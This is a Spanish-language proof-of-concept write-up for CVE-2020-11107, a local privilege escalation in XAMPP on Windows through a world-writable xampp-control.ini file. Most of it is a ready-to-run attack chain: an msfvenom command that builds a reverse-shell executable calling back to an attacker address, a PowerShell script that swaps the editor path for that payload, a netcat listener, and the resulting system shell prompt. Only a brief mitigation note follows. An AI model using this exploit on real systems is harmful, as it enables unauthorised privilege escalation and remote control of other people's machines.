
CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4
CVE-2020-11107 es una vulnerabilidad de Escalada de Privilegios Local (LPE) que afecta a Apache Friends XAMPP en Windows.
Un usuario sin privilegios puede modificar el archivo de configuración del Panel de Control de XAMPP (xampp-control.ini) y reemplazar el ejecutable del editor predeterminado (notepad.exe) con un ejecutable malicioso.
Cuando otro usuario (por ejemplo, Administrador) abre los registros a través del Panel de Control, el binario malicioso se ejecuta con los privilegios de la víctima, lo que resulta en una escalada de privilegios.
❗ Esta vulnerabilidad NO afecta a Linux ni macOS.
xampp-control.ini es escribible globalmenteC:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe
Verifica la versión de XAMPP:
type C:\xampp\properties.ini
Salida de ejemplo:
base_stack_version=7.3.10-1
base_stack_platform=windows-x64
✅ La versión es vulnerable.
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe
mkdir C:\temp
# Upload msf.exe into C:\temp
Script de explotación (PowerShell):
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file
Ejecuta el script:
powershell -ExecutionPolicy Bypass -File 50337.ps1
La víctima ejecuta:
C:\xampp\xampp-control.exe
Luego abre cualquier archivo de registro desde el Panel de Control.
nc -lvnp 4444
✅ Resultado:
Connection received...
C:\WINDOWS\system32>
🎉 Escalada de Privilegios Exitosa
Actualiza XAMPP a una de las siguientes versiones (o superiores):
Restringe los permisos en:
C:\xampp\xampp-control.ini